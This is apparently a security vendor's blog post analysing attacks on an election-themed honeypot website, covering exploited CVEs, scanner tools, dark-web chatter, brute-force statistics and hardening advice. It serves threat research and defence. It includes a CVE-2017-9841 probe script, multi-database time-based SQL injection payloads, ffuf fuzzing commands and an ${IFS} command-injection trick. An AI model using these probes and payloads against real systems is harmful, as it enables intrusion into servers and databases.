SpiderLabs Blog

Lessons from a Honeypot with US Citizens’ Data

Written by Radoslaw Zdonczyk and Nikita Kazymirsky | Nov 13, 2024 6:10:15 PM

Prior to last week’s US Presidential Election, the Trustwave SpiderLabs team was hard at work investigating potential risks and threats to the election system, from disinformation campaigns to nation-state actors looking to exploit vulnerabilities.

No information that may have potentially affected the election process was discovered at any time during the research. If it had, Trustwave SpiderLabs would have immediately disclosed its findings to the proper authorities.

These findings are part of our ongoing research at Trustwave SpiderLabs to identify vulnerabilities that place infrastructure at risk, including significant SolarWinds vulnerabilities, the novel Facebook malware Ov3r_Stealer, and the sale of millions of voter details on the Dark Web.

 

The Honey Web Service

To explore the topic in depth, we created a website that, with its functionality and the data offered, was certain to attract people with a strong interest in the US elections: a honeypot website specifically crafted to lure, monitor, and dissect cyberattacks targeting the election.

The entire project involved three separate servers, each with its own task. Aside from the main web server, which offered our realistic-looking service to US citizens and acted as the honeypot, two additional servers logged site visits, traffic generated by bots and malware, and any other attempts to connect to components of the main server. The main server also ran extra services, including monitoring of attacks from both inside and outside.


Figure 1. Our realistic-looking web service preview.

Our honeypot website became an “observatory” that allowed us to anticipate threats, understand evolving tactics, and strengthen defenses in real time. Every failed hack attempt revealed something new, allowing us to build the necessary layers of protection.


Figure 2. Connection sources map to the honeypot.

 

Who Wants to Hack US Public Citizen Services?

The US election is not just an American event; it is a global focal point, making it a prime target for foreign governments, black hat hackers, and advanced persistent threat (APT) groups. These people, often affiliated with nation-states, seek to exploit vulnerabilities for political, strategic, and economic gain.

For some threat actors, such as those based in Russia, hacking the US election is aimed at creating chaos and undermining confidence in democracy. APTs, such as Fancy Bear (aka APT28), focus on disinformation and disruption. They often aim to destabilize US leadership and weaken Western alliances.

China is another player: through groups such as APT41, it takes a more calculated approach, gathering intelligence and strategic data to better position itself in geopolitical negotiations. These groups want to understand political developments to plan their diplomatic and economic strategies.

In the Middle East, groups like OilRig (APT34) target elections to influence US foreign policy. A more favorable candidate could mean fewer sanctions or fewer interventions, so hacking becomes a tool for political maneuvering. Meanwhile, European APTs, especially those from Eastern Europe, may seek to alter US-European relations, often in more subtle ways, by gathering intelligence or sowing discord between allies.

Ultimately, the motivations for hacking US election-related sites go far beyond the digital realm. These attacks attempt to upset the global balance of power, influence politics, and weaken America's international standing. The 2024 election represents not just a political contest but also a key battleground in global cybersecurity.

 

Honeypot Highlights

Let's look at the key incidents and data collected by the honeypot to understand attacker behavior and identify typical tactics used against vulnerable server environments. By tracking interactions and connections to various server resources, we gained insight into the techniques and persistence of different types of attackers.

The map in Figure 2 shows the global distribution of attack origins targeting the honeypot server located in the US, with significant activity observed worldwide. Brazil stands out as the primary source of attacks in South America, displaying a particularly high intensity of activity. The concentration of attacks originating from Brazil suggests either a high number of vulnerable devices or active malicious actors in the region, possibly heavily contributing to coordinated botnet activity aimed at probing exposed server services.


Figure 3. Number of connections to common network services of the honeypot.

The chart presented in Figure 3 offers an insightful overview of the server's activity, providing critical data for understanding attacker behavior across different service categories.

The web protocols category consistently recorded the highest activity levels, with attack peaks in mid-July and late September. These peaks, reaching over 70,000 records, indicate that attackers primarily focused on exploiting the server's web-facing components – we’ll take a closer look at these peaks later in the article.

Activity levels for the DNS, telnet, and database services were notably lower, while SSH activity was consistently low. As Figure 4 shows, DNS traffic had occasional small spikes, representing the reconnaissance process:


Figure 4. Destination port activity statistics.

During this honeypot's design phase, we also wanted to explore the vulnerabilities that attackers can currently exploit.


Figure 5. Top observed CVE requests to the web server.

Figure 5 summarizes the four most exploited CVEs based on our telemetry:

  • CVE-2017-9841 stands out, accounting for over 40% of all detected exploitation attempts and targeting the PHP XML-RPC module in this case.
  • CVE-2019-17558 and CVE-2022-41040 accounted for 13.9% and 8.6% of the total CVE requests, respectively. This indicates that both Apache Solr and Microsoft Exchange continue to be valuable targets for attackers.
  • CVE-2014-2120 had a 12% share of the total CVE requests made to the honeypot. CVE-2014-2120 is a cross-site scripting vulnerability in Cisco's Unified Communications Domain Manager (CUCDM) that lets remote attackers inject malicious scripts into users’ sessions.

Aged vulnerabilities do not always mean fixed vulnerabilities — older vulnerabilities remain a significant risk, especially for systems that lack proper patching.

 

CVE-2017-9841

  • Description: A remote code execution (RCE) vulnerability in the phpunit package, often used in web development. Attackers can execute arbitrary code on vulnerable servers by sending malicious requests.
  • Targets: Web servers running unpatched versions of phpunit.

Cybercrime groups frequently exploit CVE-2017-9841 in mass campaigns targeting unpatched websites. These campaigns often aim to deface sites, host malware, or install backdoors on vulnerable servers. The Mirai, Gafgyt, and Hajime botnets, known for large-scale DDoS attacks launched from compromised IoT devices and PHP servers, have notably utilized this vulnerability, and automated web scanners and web-shell deployment kits are designed to exploit unpatched phpunit servers in coordinated attacks, posing significant risks to compromised systems.
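For illustration, mass scanners probing for this CVE typically target the well-known eval-stdin.php path shipped with vulnerable phpunit installs. The sketch below only constructs and prints such a request; the host name is a placeholder and the PHP body is illustrative, not an exploit payload we observed.

```shell
# Illustrative sketch of a CVE-2017-9841 probe as sent by mass scanners.
# Vulnerable phpunit installs expose eval-stdin.php, which executes POSTed PHP.
# "target.example" is a placeholder host, not a real target.
path="/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
body='<?php echo md5("cve-2017-9841-check");'
printf 'POST %s HTTP/1.1\r\nHost: target.example\r\nContent-Length: %s\r\n\r\n%s\n' \
  "$path" "${#body}" "$body"
```

A server that echoes the MD5 value back is running an unpatched phpunit, which is exactly what these automated campaigns check for before deploying web shells.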

 

CVE-2019-17558

  • Description: A deserialization vulnerability in Apache Solr, specifically affecting the DataImportHandler. It allows attackers to execute code by sending a crafted payload through a web request.
  • Targets: Apache Solr servers.

Threat actors often exploit CVE-2019-17558, targeting systems running Apache Solr to gain unauthorized access in data theft and espionage campaigns. Groups like FIN6 and Magecart have been observed exploiting Solr vulnerabilities to compromise web servers and steal valuable data. Tools such as Cobalt Strike and Metasploit frameworks are commonly used to plant malware or execute remote code in these environments. This vulnerability is especially significant in industries handling large amounts of data, making it a preferred vector for sophisticated cybercrime and APT campaigns.

 

CVE-2022-41040

  • Description: A server-side request forgery (SSRF) vulnerability in Microsoft Exchange, leading to privilege escalation when combined with other bugs including CVE-2022-41082.
  • Targets: Microsoft Exchange servers.

CVE-2022-41040 has been widely leveraged by APT groups, such as APT29 (Cozy Bear) and Hafnium, to target Microsoft Exchange servers. These groups exploit this vulnerability, often in combination with other flaws (commonly referred to as ProxyNotShell), to infiltrate corporate networks for espionage and data exfiltration purposes. Tools like ProxyShell and ProxyNotShell attack kits are frequently employed in these campaigns, particularly targeting sectors like government, finance, and healthcare. The goal is typically to gain access and steal sensitive data or disrupt operations.

 

CVE-2014-2120

  • Description: A cross-site scripting (XSS) vulnerability in Cisco Unified Communications Domain Manager. Attackers can inject malicious scripts and steal sensitive data or perform actions on behalf of other users.
  • Targets: Cisco communication systems.

Cyber espionage groups, particularly APT28 (Fancy Bear), actively exploit CVE-2014-2120 by targeting Cisco networking devices used in defense and government sectors. These attackers often leverage this vulnerability to steal credentials or escalate access within the targeted organizations. Typically, it is exploited in combination with phishing or spear-phishing campaigns, allowing adversaries to escalate privileges or deploy malware. XSS exploitation tools, like XSStrike, or phishing kits tailored for communication platforms utilizing Cisco products, are frequently observed in such attacks.

Each of these vulnerabilities plays a critical role across different sectors, frequently targeted by cybercriminals and APT groups. Attacks range from large-scale botnet-driven campaigns, such as those using Mirai or Hajime, to highly focused espionage operations aimed at stealing data or compromising systems, such as those conducted by APT29 and Fancy Bear. These CVEs are integrated into mass-scanning botnets and exploit frameworks such as Metasploit or Cobalt Strike, automating attacks across industries, from financial to government and healthcare sectors.

While the CVEs shown in Figure 5 were specifically selected for closer analysis, we are well aware of the existence of a vast number of other actively exploited CVEs. Many of these vulnerabilities are characterized by lower-intensity attacks or may be harder to detect in our observation scope, yet they still contribute to the broader attack landscape. Our focus here is mainly on analyzing malformed URL strings in web-based attacks, which provide crucial insights into the methods employed by adversaries. By concentrating on this specific angle, we aim to better understand the exploitation tactics associated with commonly accessed URLs, even as we acknowledge the breadth of other vulnerabilities being actively targeted.


Figure 6. Recorded scanner tools.

Figure 6 highlights the tools attackers used to probe the honeypot. Zgrab2 was by far the most frequently used tool, accounting for over 58% of all scans, indicating its popularity among attackers for gathering information on exposed services. This tool’s versatility and ease of use likely contribute to its high prevalence in network reconnaissance activities.

Masscan, an ultra-fast network scanner, is favored by many notorious hacking groups for its ability to quickly scan entire IP address ranges. It has been used in reconnaissance efforts by groups such as APT28, which is involved in state-sponsored espionage, and the Lazarus Group, which is linked to North Korean cyber campaigns. The Shadow Brokers and Anonymous have also leveraged Masscan to find vulnerable services before launching attacks. Its speed and efficiency make Masscan indispensable for hackers and penetration testers alike, targeting massive infrastructure in minimal time, which is why it's so prevalent in advanced threat campaigns.

Odin.io also represents a notable portion, suggesting a trend toward the use of specialized services for detailed scanning. Meanwhile, Nmap, a tool that needs no introduction, was also used against the honeypot. And the barely noticeable Xenu Link Sleuth, not widely used in the Western world, still managed to make it onto the chart.

 

A Look at the Depths of the Dark Web

The dark web is widely known as a clandestine hub for trading stolen data, exploits, and illegal goods. However, its role extends far beyond just marketplaces for illicit transactions. It is a thriving ecosystem where cybercriminals interact, share knowledge, and collaborate on various illegal ventures. Within this space, forums and chatrooms serve as breeding grounds for malicious activities, where cyber actors can identify and discuss high-value targets from the clear web, such as corporations, governments, or individuals. More than just a shopping center for stolen credentials or malware, it’s a space for networking among cybercriminals to plan, execute, and refine attacks.


Figure 7. A dark web forum thread dedicated to web vulnerabilities.

In the dark web, malicious actors often view the clear net as a space where potential victims can be identified and thoroughly evaluated. Hackers actively search for signs of weakness or vulnerability in online services, social media platforms, corporate websites, and public-facing databases. They rely on scanning tools and reconnaissance methods to uncover exposed systems, insecure endpoints, and valuable user data.


Figure 8. A threat actor suggests solutions for another member on a dark web forum.

From their vantage point, cybercriminals assess potential victims on the clear net by meticulously evaluating any available information, such as leaked credentials or security misconfigurations. They look for vulnerabilities like unpatched systems or weak encryption, which allow them to infiltrate networks or install malware.


Figure 9. A malicious actor on a dark web forum fixes sqlmap request parameters for a target.

Once a victim is identified, discussions often shift toward refining tactics to maximize the impact, whether through data theft, ransomware, or credential exploitation. This collaborative mindset helps actors in the dark web continuously improve their ability to find and exploit targets on the clear net.


Figure 10. The malicious actor asks how to install shell from local file inclusion (LFI) in a potentially weak piece of code.

What makes the dark web even more dangerous is its role as an educational platform. Experienced hackers and cybercriminals often train newer members, teaching them the skills needed to carry out sophisticated cyberattacks, ranging from step-by-step guides on launching phishing campaigns to discussions on bypassing modern security measures.


Figure 11. The actor describes an attack chain against Hack The Box, an online educational platform.

The dark web acts as an informal training ground for cybercriminals of all levels. It’s also a forum for sharing best practices on avoiding law enforcement, building exploits, and maintaining anonymity. As a result, the dark web not only facilitates cybercrime but nurtures a constantly evolving community that works together to sharpen its tactics, making it a significant threat to organizations and individuals alike.

 

Web Server Highlights

Let's discuss the highlighted events, numbers, and characteristics we observed in the attacks we’ve analyzed, which offer a snapshot of the activity surrounding the server throughout the observation period.

 

Network Protocols

The data in Figure 12 reflects a broad mix of network protocols, including SSH, SSL, HTTP, and DNS, giving us a glimpse into the variety of interactions and potential threats that targeted the server.


Figure 12. Network protocols statistics.

The server experienced several heavily concentrated attack events, including directory enumeration, brute-force attempts, and SQL injection (SQLi) targeting Apache and MySQL services. Notably, SSH accounted for 51% of the traffic, indicating a significant volume of probing for remote access vulnerabilities. DNS activity was also prominent, making up 29% of the observed traffic, suggesting legitimate usage and potential reconnaissance efforts.

 

TLS User Agent

It's no surprise that a typical web server is visited by a very large number of user agents (or TLS clients), bots, or simply browsers. When visiting a web page, each of these options presents itself to the server with a string of characters, the so-called “user agent,” because of which we can find out what software the other party (client) used to connect to our server. On the other hand, the “user agent” string is very easy to manipulate, and it can be changed or customized to whatever we want. The statistics are as follows:


Figure 13. Top TLS agent names.

Based on Figure 13, we can filter out the noisy results related to Mozilla, a common browser user agent. By doing so, we are left with the following:


Figure 14. Top TLS agent names [Mozilla excluded].

Figure 14 shows that the values of the user agent field are commonly changed and should be treated with caution. The data reveals that the TLS client “Fuzz Faster U Fool v2.1.0-dev” generated the highest number of connections, with 185,959 instances, followed by “Fuzz Faster U Fool v2.1.0” with 34,975 connections. Unfortunately, the most frequently recorded IP addresses, which account for the most connections, lead to TOR nodes.

Reconnaissance and scanning tools like “ivre-masscan” and “Expanse” are present, though their contribution to the connection count is relatively minor. The presence of such tools highlights ongoing network-wide reconnaissance activities that target this server, emphasizing the need for continuous monitoring and response mechanisms. We also noted the presence of generic or unusual user agents, such as “-“, “”, and “!(()&&!|*|”, each with hundreds of connections. These user agents seem to be attempting to obscure the client's identity.
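How little the user agent proves can be demonstrated in one line: the header is entirely client-controlled. A minimal sketch (the host name is a placeholder; no request is actually sent):

```shell
# The User-Agent header is chosen by the client, so any scanner can claim to be
# a browser and any client can claim to be "-" or garbage. This only prints the
# raw request a spoofing client would send; "honeydomain.example" is a placeholder.
spoofed_ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
printf 'GET / HTTP/1.1\r\nHost: honeydomain.example\r\nUser-Agent: %s\r\n\r\n' "$spoofed_ua"
# With curl, the same spoof is a single flag:
#   curl -A "$spoofed_ua" https://honeydomain.example/
```

This is why server-side statistics based on the user agent alone should always be treated as self-reported, not verified, data.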

To characterize a given connection more reliably, we used a solution called Ja3, which we will focus on in a later part of the article.

 

HTTP Requests

Web request analysis, especially HTTP GET and POST, is useful to identify attacks and potential vulnerabilities. Examining requested files and directories can help spot unusual patterns and potentially malicious activity.

GET requests were the most prevalent, constituting most of the traffic, while POST requests and other types occurred less frequently. Attempted exploit payloads were usually carried via POST requests.


Figure 15. HTTP request methods.

The high volume of GET requests highlights the attackers’ emphasis on reconnaissance, a very common practice: attackers seek to understand the structure of the server and identify any weak points they could exploit. POST requests, despite their smaller share, remain a concern, as they often carry potentially harmful payloads. This indicates that the adversary was probing targets with specific requests.

User agent string analysis provides valuable insights into the nature of web traffic. Most user agents recorded during our research were FFUF (Fuzz Faster U Fool) Fuzzer and variations of Mozilla, together accounting for 98.7% of all requests.


Figure 16. Web browser top client names.

FFUF is a popular web fuzzing tool widely used by hackers and penetration testers for its speed, versatility, and advanced capabilities. One of its standout features is its ability to target multiple vectors in web applications, making it a powerful tool in security testing. FFUF’s efficiency allows it to quickly discover hidden files, directories, or parameters that are not publicly accessible, giving attackers a broader surface to explore.

 
Figure 17. An actor on a dark web forum suggests the use of the FFUF software as a better scanner to try (post translated).

What makes FFUF particularly appealing is its ability to handle various fuzzing targets, such as web directories, HTTP parameters, DNS subdomains, and even HTTP headers. Its extensive configurability enables users to craft highly tailored attacks based on specific use cases. This makes it useful for basic brute-forcing and more complex web application testing, including parameter fuzzing and discovering vulnerable endpoints.

For example, in an advanced configuration, FFUF can be used to fuzz POST requests with custom data or fuzz HTTP headers for vulnerabilities in header handling:

ffuf -w /path/to/wordlist.txt -u https://example.com -X POST -d "username=FUZZ&password=test"

This highlights FFUF’s flexibility, as it allows for parameter fuzzing to uncover security holes in login forms or other parts of the application where data is processed.

Additionally, FFUF can handle fuzzing across different HTTP request methods and leverage customized headers, as seen in cases where security filters were bypassed by tampering with header information:

ffuf -w /path/to/wordlist.txt -u https://example.com -H "X-Custom-Header: FUZZ"

The tool’s adaptability makes it suitable for a variety of attack vectors, helping identify issues, such as broken authentication, file inclusion, or security misconfigurations across various endpoints. By discovering these vulnerabilities, attackers or testers can gain access to critical web resources or find exploitable weaknesses in web applications.

FFUF’s ability to brute-force web resources quickly is enhanced by its integration with other security tools. By connecting it with proxies or using it in conjunction with vulnerability scanners, it gives attackers and pentesters a comprehensive view of a web application’s attack surface. This multi-vector capability, combined with FFUF’s speed and ease of use, makes it one of the most sought-after tools in offensive security operations, particularly in web-based testing scenarios.

 

Connections Activity

HTTP response codes play a vital role in understanding how clients and servers interact during web communication. They provide crucial insights into web traffic behavior, user experience, and potential security considerations.


Figure 18. Top HTTP responses.

The HTTP responses reveal an aspect of the attacks, and, together with the rest of the analysis, create a compelling story about the methods attackers use.

  • 404 (Not Found) response was the most frequently triggered, making up 58.7% of the total responses. This indicates that attackers were aggressively searching for hidden resources, non-existent admin panels, or vulnerable directories that could serve as a gateway to the system. Each 404 response is essentially a missed shot in a larger campaign of scanning and resource discovery using automated tools (Figure 17) to quickly and systematically sift through potential entry points. The high frequency of this response reveals the intensity of the attackers' reconnaissance efforts to understand the server structure and identify vulnerabilities.
  • 200 (OK) responses made up 16.4% of the total. This status code signifies that the requested resource was found and served successfully. In the context of our honeypot, every 200 response likely means that the attackers discovered a legitimate-looking page. Unlike the 404 errors that show blind probing, a 200 response indicates interest and successful access.
  • 301 (Moved Permanently) responses were observed in 23.4% of cases. These mostly reflect attempts to visit the site over plain HTTP, which the server redirected to HTTPS; most modern web servers have such a redirect configured.

Figure 19 shows the volume of HTTP, HTTPS, and MySQL records over a period of time:


Figure 19. Three main domains of observation and their attack coverage.

Significant peaks are noticeable, primarily for HTTPS traffic where a sharp increase was seen in mid-September. This pattern illustrates a series of attack attempts targeting the HTTPS service. These large fluctuations in HTTPS traffic indicate targeted attempts to bypass security measures and explore more secure channels. This emphasizes the need for diligent monitoring and possibly enhanced rate-limiting on HTTPS endpoints to mitigate potential distributed denial-of-service (DDoS) attacks or brute-force attempts.

The relatively stable but present MySQL activity shows attempts to gain unauthorized access to backend databases. Any successful access here could have critical implications, as it might lead to data breaches or further exploitation within the internal network.

 

Searching SQLi

In Figure 20, we observed a snippet of an SQLi attack aimed at the website's search functionality. While we recorded several similar SQLi attempts during the monitoring period, none of these attacks were significant enough to pose any real threat to the service’s security. The inadequate payloads and weak execution demonstrated by the attackers left the system largely unaffected. However, it remains a reminder of the ongoing risks associated with such vulnerabilities, emphasizing the importance of robust security measures in web forms.


Figure 20. A web service user’s search log (SQLi attack).

The attack demonstrates a typical approach, employing SQLi techniques to probe our database. The attacker systematically tested various database systems by utilizing functions unique to MySQL, PostgreSQL, SQL Server, and Oracle. This strategy indicates an effort to perform database fingerprinting, allowing the attackers to identify the specific database management system being used and tailor their attacks accordingly.

The SLEEP(5) function indicates a time-based SQLi attack (blind SQLi), aiming to call and observe delays in the database response. By observing these delays, attackers can infer whether certain conditions were true, thereby gaining insight into the database structure and behavior without direct access to data outputs. Also, the attackers incorporated conditional statements and character encoding within their inputs; by using functions such as CHR() or CHAR() to represent characters, attackers attempted to bypass input validation mechanisms that might block specific keywords or patterns associated with SQL injection attacks. This approach increased the likelihood of malicious input being accepted and executed by the database. By embedding always-true logical conditions such as “1219=1219” within SQL statements, the attacker could test the database's behavior and the application's response to injected code, assisting in mapping out potential vulnerabilities.
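The fingerprinting probes described above can be sketched as follows. Each database engine has its own delay primitive, so whichever payload stalls the response for five seconds reveals the backend. The payload strings below are illustrative examples of the technique, not the exact inputs recorded by the honeypot:

```shell
# Sketch of DBMS-fingerprinting payloads: each delay function exists on only
# one engine, so a 5-second stall identifies the backend. The always-true
# condition 1219=1219 mirrors the pattern seen in the recorded attack.
mysql="' AND (SELECT 1 FROM (SELECT SLEEP(5))x) AND '1219'='1219"   # MySQL
postgres="';SELECT CASE WHEN (1219=1219) THEN pg_sleep(5) END--"     # PostgreSQL
mssql="';IF (1219=1219) WAITFOR DELAY '0:0:5'--"                     # SQL Server
oracle="' AND 1219=DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98),5)--"  # Oracle
printf '%s\n' "$mysql" "$postgres" "$mssql" "$oracle"
```

Note the use of CHR() in the Oracle variant: representing characters numerically is exactly the input-validation bypass described above.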


Figure 21. A web service user’s search log (command injection).

The input log above is a command injection attempt, in which the attacker tried to execute system commands via the website’s form fields. The use of the nslookup and curl commands indicates an attempt to connect to a remote host under the attacker’s control in the bxss[.]me domain:

The ${IFS} variable is the shell’s internal field separator on Unix systems (by default space, tab, and newline); attackers use it in place of a literal space to evade detection by security scanners that filter on spaces.
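The trick can be reproduced harmlessly in any POSIX-like shell; a minimal sketch:

```shell
# ${IFS} expands unquoted and is then used for word splitting, so it acts as a
# stand-in for a space, letting injected commands avoid the literal spaces that
# naive input filters look for. Harmless local demonstration:
injected='echo${IFS}hello'
eval "$injected"          # behaves like: echo hello
```

A filter that blocks form input containing spaces would pass `echo${IFS}hello` straight through, which is exactly why the honeypot’s attacker used the same construction with nslookup and curl.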

 

Overlooked database_backup.tar.gz

To increase the project’s reach, we created a seemingly hidden backup directory at “honeydomain.com/backup” and placed a database dump inside. The file, “database_backup.tar.gz”, was watermarked to track its distribution and detect any mentions on the dark web or other underground channels. Despite 22 unique visitors accessing the directory, most attackers appeared to overlook the file’s presence entirely, failing to recognize its significance.

This oversight highlighted a lack of thoroughness in the attackers’ behavior. Even more telling were the numbers of visits to the “files” subdirectory in the “backup” directory. This subdirectory is mentioned in the “.htaccess” file as a lure for attackers preparing to deepen their attack. It contained only an empty “index.html” file, intended purely to raise curiosity and prompt attackers to enumerate the directories more deeply. Despite receiving 10 visits, it remained unexplored. Such patterns reveal that many attackers relied on automated tools without performing manual verification, missing a chance to uncover valuable resources.

The first suspicious download, from a TOR node, occurred on September 22, 2024. The second took place on October 2, 2024, involving a few IP addresses from Russia, none of which were TOR nodes. In total, we recorded nine download attempts for “database_backup.tar.gz”, and analysis revealed two unknown actors (groups).
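The watermarking mentioned above can be as simple as planting a unique per-copy canary string in the dump; any later sighting of that token on the dark web then identifies the leaked copy. A minimal sketch (the token, table, and record are hypothetical, not our actual watermark):

```shell
# Minimal watermarking sketch: embed a unique canary record in the dump so a
# later sighting of the token (in a leak, a paste, a forum post) identifies
# this exact copy. Token and schema are hypothetical.
workdir=$(mktemp -d)
cd "$workdir"
canary="WM-7f3a9c1e"
printf 'INSERT INTO citizens VALUES (424242, "John Doe", "%s");\n' "$canary" > dump.sql
tar -czf database_backup.tar.gz dump.sql
# Later: check whether a recovered archive is our watermarked copy.
tar -xzOf database_backup.tar.gz | grep -o "$canary"   # prints: WM-7f3a9c1e
```

In practice the canary should be indistinguishable from the surrounding forged data, so an attacker inspecting the dump cannot strip it out.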


Figure 22. Number of accesses to the backup location.

The attackers’ incomplete reconnaissance and failure to investigate key directories further even after identifying them suggest that their preparation was superficial, and their methodology was far from sophisticated.

 

Ja3 Indicators

Ja3 fingerprints represent unique SSL/TLS client signatures used for identifying clients based on how they communicate. These fingerprints are calculated by combining attributes such as SSL versions, cipher suites, and supported elliptic curves, making each fingerprint a valuable identifier in monitoring traffic patterns and recognizing malicious actors.


Figure 23. Most active Ja3-fingerprinted clients.

It’s hard to ignore the massive number of connections by the two most active TLS clients shown in Figure 23.


Figure 24. Highlighted activity of two of the most active TLS clients based on our telemetry.

The first hash, with over 95,000 connections, correlates to directory enumeration attempts recorded that day. Examining the top hash (1be8360b66649edee1de25f81d98ec27) shows associations with known malicious activities and tools such as Cobalt Strike or Metasploit, as well as the Tofsee malware.

The second hash (bff6a4467efb3b8eb8688abd7f120f8e) accounted for more than 20,000 connections, which, interestingly, came from only one IP address: 146.70.193.89. This event marked the beginning of the larger directory enumeration activity recorded from around September 14 (Figure 24).

During the heavy reconnaissance periods on August 31 and September 17, specific IP addresses made requests using tools like "Fuzz Faster U Fool" and common browser agents, as seen in Figure 19.

The high volume of records linked to these JA3 hashes indicated persistent campaigns involving automated tools as well as attempts to mimic legitimate user behavior.

 

MySQL Highlights

The database was one of the key components of the whole project. Our MySQL server backed the site with a huge amount of forged data that we crafted to be very attractive to all kinds of attackers.

Figure 25 shows the number of connections to the database over a two-month period (August and September 2024).


Figure 25. Authentication attempts to the MySQL server between August and September 2024.

The histogram presents the sum of all MySQL login attempts (brute force) on all listening database ports. We recorded the different usernames tested in these attacks; the most common were root and admin.


Figure 26. MySQL’s brute-force usernames tested.

The username “root” was the most frequently targeted, accounting for 14,003 connections, which vastly outnumbered the rest. This suggests that attackers are heavily focusing on gaining elevated privileges by attempting to brute-force or exploit the root account, which, if successful, would grant complete control over the system. The high volume of attempts targeting “root” emphasizes a critical need for strong password policies, restricted access, and additional protective measures such as disabling remote root login.

The other usernames, including “admin,” “app,” “dba,” and “dbuser,” saw significantly fewer connection attempts, each in the range of a few hundred. This indicates a more opportunistic approach from attackers testing common usernames in hopes of gaining a foothold. However, the disparity in numbers shows that “root” remains the primary target because of its high-level privileges.
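Counts like those behind Figure 21 can be derived by tallying the username targeted in each failed-login event. A minimal sketch, assuming a simplified log format modeled on MySQL's “Access denied” messages (the real format varies by server version and logging configuration):

```python
from collections import Counter

# Hypothetical failed-login lines in the style of MySQL's error log;
# the IPs below are documentation-range addresses, not real attackers.
log_lines = [
    "Access denied for user 'root'@'203.0.113.5' (using password: YES)",
    "Access denied for user 'root'@'198.51.100.7' (using password: YES)",
    "Access denied for user 'admin'@'203.0.113.5' (using password: NO)",
]

def count_usernames(lines):
    """Tally the username quoted after "user '" in each failed-login line."""
    counts = Counter()
    for line in lines:
        start = line.find("user '")
        if start == -1:
            continue  # skip lines that are not failed-login events
        start += len("user '")
        end = line.find("'", start)
        counts[line[start:end]] += 1
    return counts

print(count_usernames(log_lines).most_common())  # [('root', 2), ('admin', 1)]
```

Run over two months of honeypot logs, the same tally surfaces the heavy skew toward “root” described above.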

 

Good Security Practices

  • A correctly configured ‘.htaccess’ file can stop many common attacks. Access limitation can be applied to specific directories or files by using directives such as AuthType, AuthName, and Require. This is particularly useful for protecting sensitive areas of your website, including admin panels or private data. Another useful security option that can be configured via the ‘.htaccess’ file is HTTP headers, such as Content Security Policy (CSP), which help prevent cross-site scripting and data injection attacks.
  • Restricting common usernames and simple passwords can help mitigate dictionary and brute-force attacks.
  • Automated exploitation attacks by botnets are still prevalent in the cybersecurity landscape, putting a wide range of unpatched systems at risk. Prompt application of security patches and updates to your web applications and databases will help mitigate the exploitation of known vulnerabilities.
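As a sketch of the first point above, a minimal ‘.htaccess’ fragment combining basic access control with a Content-Security-Policy header might look like the following (paths, realm name, and policy values are illustrative):

```apacheconf
# Require authentication for a sensitive directory (e.g. an admin panel).
AuthType Basic
AuthName "Restricted Area"
AuthUserFile /var/www/.htpasswd
Require valid-user

# Send a restrictive Content-Security-Policy header to curb XSS and
# data-injection attacks (requires mod_headers to be enabled).
<IfModule mod_headers.c>
    Header set Content-Security-Policy "default-src 'self'"
</IfModule>
```

Note that `AllowOverride` must permit these directives in the server configuration for the ‘.htaccess’ file to take effect.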

 

Summary

The 2024 US Election became a battleground not only for political candidates but also for cyber adversaries aiming to undermine the democratic process. The honeypot we deployed to mimic a citizen service-related web service encountered persistent and sophisticated cyber activity from a wide range of attackers. The motivations spanned everything from political manipulation to opportunistic attacks, revealing the extensive digital risks to election integrity.

The honeypot captured a variety of attack types, including brute force, directory enumeration, and SQL injection attempts, targeting both web applications and databases. Automated tools like FFUF, Masscan, and Zgrab2 were heavily employed, emphasizing the attackers' focus on large-scale reconnaissance and exploitation. A significant number of attacks aimed at gaining administrative access, with a particular focus on brute-forcing the “root” account, underscoring the critical need for robust access control measures.

The findings from the honeypot illustrate the importance of enforcing strong access controls, such as using complex passwords and disabling default usernames like “root” to deter brute-force attempts. Limiting unnecessary services, applying security patches promptly, and implementing network-level security measures are also essential steps in mitigating these threats. Organizations can further reduce the risk of successful attacks by using .htaccess files to restrict access to sensitive directories and employing rate limiting.

Monitoring activity on the dark web can provide early insights into potential threats and vulnerabilities, while regular security audits and assessments can help identify weak points before attackers exploit them. Utilizing honeypots remains a valuable strategy, offering unique insights into emerging attack methods and helping defenders stay ahead of malicious actors.

The data collected throughout this project shows that the threat to election infrastructure is real and persistent. By taking proactive measures to strengthen security, the resilience of critical systems can be significantly improved, ensuring that the democratic process remains secure and that public trust is maintained.